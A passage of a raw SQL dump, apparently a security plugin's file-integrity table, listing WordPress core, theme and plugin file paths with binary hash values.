q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�€Ԁ�v��Ș~����','',0,'?'),('�8Kf���l.�\\��S','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����.�W�GX�W','b)cp�a~Z6nh���c	\02S�P�.r:�ׁ��','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s	�Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�c��\r�|ҟ�\"��','wp-content/themes/fluida/resources/fonts/fontfaces.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԓ�����_%�ώ��','�r2D��U\r\"��,�?�� E\0!-��/ٵw','',0,'?'),('�dt���S0�[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�p89�y�N\rZ��qK','wp-content/themes/nirvana/images/patterns/pattern7.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ء��\r�_y��','��\r_����L�n*�X�cz6���O̹','',0,'?'),('�pޏMjl���f�}�','wp-content/themes/morfeu/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j%f�f�O���,b�','�D��-���װl�T,ў;�6a{]���\\x\r�','',0,'?'),('�r7��w�7�̷','wp-content/themes/illdy/layout/js/bootstrap/bootstrap.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�#��Z|.ƛX�^��(','z3}�8o!�]��g���0��,�w����','',0,'?'),('�t�A�H�,1�t�@e','wp-content/themes/mh-magazine-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���+��[QM��I','�^=slh�����):\n�l�V!��1m��)v','',0,'?'),('�zw�ƈ_�/�����','wp-content/themes/tortuga/inc/customizer/sections/customizer-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m��~%�f!9�4��','5Ewc1¶���U�ݗ�Q4 ���G���','',0,'?'),('�}�5G����n>�\0','wp-content/themes/relia/inc/js/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+%�Q��m��Z$�','m�Hƙ-�}��\Z��׮���%wʮ���','',0,'?'),('ƅ����|_�i/y��	','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ɔ����Jn���P[3','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/views/view.php',0,'�yIdRRNڜ�<���','�yIdRRNڜ�<���','[��Z�W?��N�/��#5��?��A�','',0,'?'),('Ɣ�}r��ףC9�L� \n','wp-content/themes/sg-window/inc/js/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_	��w��U� 	D�','�r�Jr��u~�D�WK��^�@\'��5s�%','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2(fP��=��<tk�','���.h�g5k#���ʛ\r/�)��\\�9�8�','',0,'?'),('ƭAR����9!,6�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/static/js/builder.js',0,'߁�6[�^�TguX','߁�6[�^�TguX','���]:��3���P:A*Ʋ��bg�ľ�','',0,'?'),('ưG�>wxݕ���','wp-content/plugins/all-in-one-wp-migration/lib/controller/class-ai1wm-main-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�\"U��\rI��a���i','5D�a֐�\0�ο肅F^{�5w��|V��0J�y','',0,'?'),('Ƽ����~9��~籌�','wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php',0,'T3����r�A��','T3����r�A��','WJ�)7�b[,/�&\ni7ޮI\0� �%��','',0,'?'),('��֪W��RU�\n�','wp-content/themes/nirvana/images/socials/Skype.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E4�\ZRj9gȭ�Q�','�2�&ã�y�!�fB�o�c�q�;NBm��','',0,'?'),('�î�>s���D�D','wp-content/plugins/all-in-one-wp-migration/lib/view/backups/backups-permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8L��/v��d�\0�','&�6`�fƬ3�T7�x\\2⺧7��T��Q���','',0,'?'),('�Ցf�)cW)֗�Og�','wp-content/themes/twentytwentyone/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��5�%�$���','}�C!�Mk;\'�?]�]��VW��A�e�Bߊ�','',0,'?'),('�ע���9+H�F+�9','wp-content/themes/mh-magazine-lite/images/placeholder-large.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��_���7�=','�x�ߗ�����g�[	Ι��ؓ�DPMI�,','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�0�\"����#�','��֩y\n�	��ij����X�H�-<f	��c�','',0,'?'),('��B��f{L��Hnt','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.publicdomainregistry.php',0,'��\r6�U��w��(','��\r6�U��w��(','�j�3��\"�E��y����Ƅ�{��2+��','',0,'?'),('��➍�f[�K���H�7','wp-content/themes/travelify/languages/fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�9M�‰lؖ�8��X','��:iU��ZD�����A滕���j#Y.��','',0,'?'),('��ƨ2�b�Yw�[R','wp-content/themes/tortuga/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�@@��0UI��I��','��s�BxI<a3�Hk�ǻ��Y���M�','',0,'?'),('��mg�T	�K|)Q�@','wp-content/plugins/spam-captcha/core/parameters.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�Q�ϥ��p%�.��3','3`VW�����i�*�k�M��vW�mYf��t0','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\0)�q�H��h�?�','7��AJ�#��h���à �T$m�ܿt�m','',0,'?'),('�����WM�P����','wp-content/themes/hueman/languages/en_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O݂,����;�o7��','��].��\r�\nz�v4��� �f���R\0}T��','',0,'?'),('�k8Q?<׊��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�$�02j��i�1�#�','wp-content/themes/the-minimal/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��tin3�ò�u:u','�>v{t��VS4p�w�hn5�!W��2��r_U�','',0,'?'),('�5˿$x�� ;B�ص','wp-content/themes/morfeu/assets/sass/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������� �^ĝ��','S���@hΨ7����z\r�H����\Z�u@2','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$y��X�FV��&@','�=M)_I��u�����|K��{0r:����','',0,'?'),('�a���r?�DK�3l\\','wp-content/themes/barletta/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!p���w���&h','X�\n}�l�//���C��;N�YTV�|t]Yb��','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('ǂ� nj��J�9Ny�\0�','wp-content/themes/barletta/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>%�Ro_��������6','�����H,.�ޗk�+i@-�lh���=E+A�','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a]�Z��+\"8��','!	�X/@��P�s��\"\\q(��k�\"���`��','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�Dy[�����Zt=��','�\Z�����\"��DB�kDz����PO���4:�_','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k�����	','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',0,'\"\Zt�\'4E0�![p','\"\Zt�\'4E0�![p','�z�7�\n7��{2Z�Y��ì��Mb�\n�;','',0,'?'),('ǯ��\r�?��ғ�7��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lv.js',0,'\'�B��rz����g�f','\'�B��rz����g�f',';��\"c1.���R��M\"�v�7q���cF�nn','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('��\'�d���?گ9�E','wp-content/plugins/spam-captcha/js/raphael-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Б/��gޘ�-8��','���^�Kz]X��B�2�oE�~ͻ����FO','',0,'?'),('�ڙ�P�\nVq���a�','wp-content/themes/verbosa/resources/fonts/icomoon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�WDfƔ,�Y\\.�Z�','j\0�R�E-z0W�{KN�_ΐ���ůcf�oP','',0,'?'),('����(�7�&��','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.fj.php',0,'�/Er/(�ܕ�Ik`]','�/Er/(�ܕ�Ik`]','��f`t�E�nY�Έ$\0w�\\W��-��','',0,'?'),('��(���d*e�S�','wp-content/plugins/unyson/framework/core/extends/class-fw-option-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��s����}SzP�','�0k������3䵟��P%iX��V	��','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}��=kq�δ','wp-content/themes/sg-window/img/icons/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g+�d e���v','���&+B��V�9\'�!�hh���g�9','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('�kꯃt��OBU��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/static/js/calendar.js',0,'�C�QUY���p*h�','�C�QUY���p*h�','�B�P�Ձ�]ɘL>4���\Z�J�z,�okK','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('�\Z��)��O��M|Z','wp-content/themes/alpha-store/lib/wp_bootstrap_navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.���TKK\'���0','�it-�O�%1����=R	�S�','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�!@%�\"HM�U{','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.aero.php',0,'�2J�C����kÓ','�2J�C����kÓ','ƇϏ:��C�?k��1�x�P�O8FB','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�(<�,a2zd�Pu}�','wp-content/themes/the-minimal/images/date-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k_9\0�\0��/�a�\\','pq�@N����܀�+�ǖ��IUE\n� �~','',0,'?'),('�.�)�U�؈��#*g�','wp-content/themes/lightly/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���)�/��%W�>','׈>*�M�<�L8�C��C<h[���}�,�','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8��j|\r�FU�af�','wp-content/themes/vega/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rs�ޓ0��c����','\r�����V|��R�U�	���Ӧ�%�S','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'l��DV��PS','�E��Z����V�{��m�,��^�4����o�~','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�e��jo;(��eW�','0�Z��HI��\'��W��a)���o\n3�2�6}3�b','',0,'?'),('�[pX��ʼnh����','wp-content/themes/travelify/languages/de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R�	�n�D���1','�صK�b��\0��=B�f����\\����l�t��2','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('Ȣ�@Ø�`U�ѣ /�','wp-content/themes/sg-window/img/icons/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��?߽�I5X\0��','�^	m�~�=`!��pb��Nd�Lox�s�Otx�','',0,'?'),('Ȥ	��1]#w3]��','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�5�䐿�P6�H��','�u��=:��8q =���R����m V���/','',0,'?'),('Ȧ���G��$~B��','wp-content/themes/aqueduct/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('ȧ��)���Z�y�','wp-content/themes/alpha-store/lib/customize-pro/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѱ�@�p�y����','6�\r����^��!��XЅu�`���MP���q','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('��t��$0l;r#q��K!','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����1���s���','n�Hb\'�(\ni�_h�6��7�j�O��̓Ŗ|E�','',0,'?'),('��Ø?#,��.����','wp-content/plugins/unyson/framework/includes/option-types/typography-v2/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mm�\0�qF1�KR����','z������zo���C�^oq/�.�p�(�','',0,'?'),('��}��Uk����Xm�','wp-content/themes/twentyseventeen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$d�~��6����','B)�Y��bgM\"l $H:����[S�f.}��','',0,'?'),('��Q�q�}ޅ��[\r��<','wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php',0,'Q�,3�zi3�%g�Uco','Q�,3�zi3�%g�Uco','�6�\rS�}*z���ǚ�6�#�� �L�-','',0,'?'),('����$�1Ts�M�','wp-content/themes/nirvana/languages/tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�Y��Dh\n\n��N믛','��U��C޿�6<�z����Io','',0,'?'),('���\"��������\Z','wp-content/themes/the-minimal/images/next2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lύ8�[�\\�].�/(#�','�F�$ur�V��[�n������. <ࠎ�','',0,'?'),('��*�-�q��=Y�','wp-content/plugins/unyson/framework/core/extends/class-fw-container-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>iK7�Ln��V~-��4','F�UŦ]��t�V�.��ID���mx��o�','',0,'?'),('�	P]�R��B�\'4��f','wp-content/themes/nirvana/fonts/DroidSans-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U&�l��/;�[D�K\Z','ta�t�-����\\��p��%ZԿi�V4H�����*','',0,'?'),('�{����8�\\a�k�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/config.php',0,'���&X�ְ&eSR�G݈','���&X�ְ&eSR�G݈','h����~2�Y�M�����U�gNg�H��:�]','',0,'?'),('�m`��hC�6�!0','wp-content/themes/fabulous-fluid/css/jquery.sidr.dark.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=~Y�\"\"3�$`�g�\r','#�Oo�ĵ���?a�J	��sl(͝�HH,','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�XU�vRS��jχ��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/config.php',0,'��fJ�y!��ܟ�J','��fJ�y!��ܟ�J','C�Q���g���9�T�5v�)�@��}=��U�','',0,'?'),('��܄�񲺓DR9�','wp-content/themes/supernews/acmethemes/sidebar-widget/acme-col-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qe֝��;�]�n','�J�B�D���D��tf��!Nӿ(�c���H','',0,'?'),('�����k�i/\'9�v�r','wp-content/themes/illdy/inc/customizer/panels/sections-order.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7ֱ��y��Ap��','7-���H\r`�,��-��F�\rhr�u�r��,7B','',0,'?'),('�4A�?����u�j/�b','wp-content/plugins/contact-form-7-modules/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:C/��=aJOPuNn','`�%�$�����<�~�5#�;�\nlw{ ���-�','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',0,'(�Wg߳�U3ؼͅi�','(�Wg߳�U3ؼͅi�','ػ���ז�9zA�V�D,�!ȖB�C�����','',0,'?'),('�:O��-�Ax�P�h��L','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B�)>|�o.P��','����<\n�@ô�H�+ީ�eI�-\"��mb*!y','',0,'?'),('�>�c�.�:_�9(7','wp-content/themes/hueman/option-tree/assets/images/ot-select-hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EA��b����NI4՘','(�y�;�Xvaϫ_@_���=1�QՓ3[���','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oI��+B`��k�\n�','b*.��f�`�����k�]x��9�8�\"������','',0,'?'),('�D\'��,,T	,���+','wp-content/themes/barletta/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ktc\"����C�','��_�Ҽ��?9_r�5:�\\�S��A1-�','',0,'?'),('�IY�o��/������','wp-content/plugins/spam-captcha/core/img/tab_mail.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��O�Þ��\0VG�','��N�\"�_���<~Us_��z��a�d��q��','',0,'?'),('�b��9�Z\n`5M�~','wp-content/plugins/spam-captcha/lang/spam_captcha-cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�B�P���o','Ho��Ĝ0a4{��\n-�v0�d$��$�t�M\rd�','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('�q\nF	���I���','wp-content/plugins/spam-captcha/core/img/title_popup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��݄���j�.��n��','X��6����g�p��V8y���p���\r���o','',0,'?'),('�r�x�<SrӦ\n6	���','wp-content/themes/tortuga/template-parts/content-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��U��ë�x','�^��0��%�qY��;��<f�r��sa��Z','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('ɤ@�UV�h��gzp�','wp-content/themes/nirvana/fonts/Oswald-Light-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�\'*���f=	�','�B�;TDRrA�`�G��_�t�v�Bw','',0,'?'),('ɰz�y�熟\0NpX�3','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.it-CH.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��^�vmFR/ո��','o����;+��]%�P�r�t<��l�LH*r','',0,'?'),('ɺ�_��\Z�SP��!','wp-content/themes/point/images/300x250.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-����e�`1','��95v����DS�Ʉ�\0u�<D����@�h�','',0,'?'),('�Ŏ�����l����F','wp-content/themes/hueman/functions/czr/modules/modules-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?7*J3cY>�уQ�B�','>���������=G��^���,!P���q7�~T','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('�ߋĦHr&W�Kx^u*','wp-content/themes/nirvana/content/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\9�f�4�xL���]v','�C`*��ó��k���N~��y�fJ(9�k�|�V','',0,'?'),('��Oh@-���:K���','wp-content/themes/sg-window/publication/js/functions.js',0,'���w(Nh��i^n��','���w(Nh��i^n��','-G�Vѳ.���7{��D�\n��b)�[��_M��','',0,'?'),('����=Mq����','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_CurlIO.php',0,'�-{�2�\n<i�r�d�M�','�-{�2�\n<i�r�d�M�','�B/(Į6�qv��@ӏ�����~�R��*�','',0,'?'),('� �����(@Rmy','wp-content/themes/sg-window/publication/single.php',0,'#���9��?F��TaΖ','#���9��?F��TaΖ','d�ow}�A�T�swW�l��}0�6˅�g_���','',0,'?'),('�\"��R��vN]Б���','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' j�V�\\����\Z�','u�p�U�8�`򻵨�しڝ\'�Rw�+��D���','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���2������)�q','=M#�S�FX�~U�ȇ�ڬW��=�L�m&','',0,'?'),('�+�����E�0ڊ','wp-content/themes/nirvana/fonts/sourcesanspro-extralight-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���nŵ]5)%S��','-��Y�8*\\G�C=��b2��̓�W����','',0,'?'),('�6\"��ޣi��wi<�u','wp-content/themes/fabulous-fluid/images/featured-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]���7���ȋ�@�/',';V��+0r���.7�W�.�R���[����(Em','',0,'?'),('�@�9�_����#�Y\r-','wp-content/themes/nirvana/images/socials/VK.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?&-\r$*��S5C�','L��֊�����ix\0#���M��C�\n�D����~','',0,'?'),('�D0��6mq����','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-mega.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш�b�M#@�a=̀C�','q;��ɧ��n��5ȷ�4d,�,*\Z�*���i���','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"E�;��)�Q&�X�\0�','��zB��RR~\Zj��>k�h�z��V�}̲','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.�Q��~��EFЫ�E','<�|�<�NDqd�|H�::%t�����=','',0,'?'),('�l������Ϟ��','wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/includes/OAuth.php',0,'�rÃ��p��a�[�7D','�rÃ��p��a�[�7D','��lAQK���ȸj�e\n\n�	